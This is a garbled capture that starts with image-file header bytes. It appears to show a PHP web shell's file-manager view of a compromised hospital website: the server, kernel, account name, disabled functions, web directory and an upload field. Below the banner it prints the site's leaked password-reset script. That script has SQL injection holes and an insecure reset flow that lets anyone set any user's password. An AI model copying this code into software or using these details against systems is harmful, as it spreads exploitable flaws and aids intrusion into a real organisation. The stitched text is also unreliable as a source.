ÿØÿà JFIF ` ` ÿþ
Server : Apache/2 System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64 User : benhviencoc7 ( 1008) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname Directory : /home/benhviencoc7/domains/benhviendkkvcampha.vn/public_html/adminvn/ |
Upload File : |
<?php /*----------------------------------------*\ | Copyright © C-ILY | | Phone: 0983.998.994 | | Y!m: notepad.html | | Email: truongpv87@gmail.com | \*----------------------------------------*/ define('CILY',true); include('../#includes/config.php'); if(strlen($_POST['nick']) > 3 && strlen($_POST['email']) > 7 && $_POST['captcha'] == $_SESSION['captcha']){ list($check) = @mysql_fetch_array(@mysql_query("SELECT user_password FROM cily_users WHERE user_nick = '".$_POST['nick']."' and user_email = '".$_POST['email']."'")); if($check >= 1) { $link = URL_SITE.'/fogotpass.php?nick='.$_POST['nick'].'&key='.$check; @mail($_POST['email'],get_option('name').' | Lấy lại mật khẩu','Vui lòng click vào link sau để tiếp tục quá trình:<br /><a href="'.$link .'" target="_blank">'.$link .'</a><br />-------------------------------------------------------<br />'.get_option('name').'<br />Email: '.get_option('email').'<br />Website: '.URL_SITE,"From: ".get_option('email')."\r\nReply-To: ".get_option('email')."\r\nContent-type:text/html; charset=UTF-8\r\n\n\ "); header('Location: ../w3c-fogotpass.php?check=success'); } else header('Location: ../w3c-fogotpass.php?check=error'); } elseif(strlen($_POST['pass']) > 5 && $_POST['pass'] == $_POST['againpass'] && $_POST['captcha'] == $_SESSION['captcha']){ @mail($_POST['email'],get_option('name').' | Mật khẩu mới','Chào'.$_POST['nick'].'!<br />Mật khẩu mới: '.$_POST['pass'].'<br />-------------------------------------------------------<br />'.get_option('name').'<br />Email: '.get_option('email').'<br />Website: '.URL_SITE,"From: ".get_option('email')."\r\nReply-To: ".get_option('email')."\r\nContent-type:text/html; charset=UTF-8\r\n\n\ "); @mysql_query("UPDATE cily_users SET user_password = '".md5($_POST['pass'])."' WHERE user_nick = '".$_POST['nick']."'"); header('Location: ../w3c-login.php?nick='.$_POST['nick']); } else echo header('Location: ../w3c-fogotpass.php'); ?>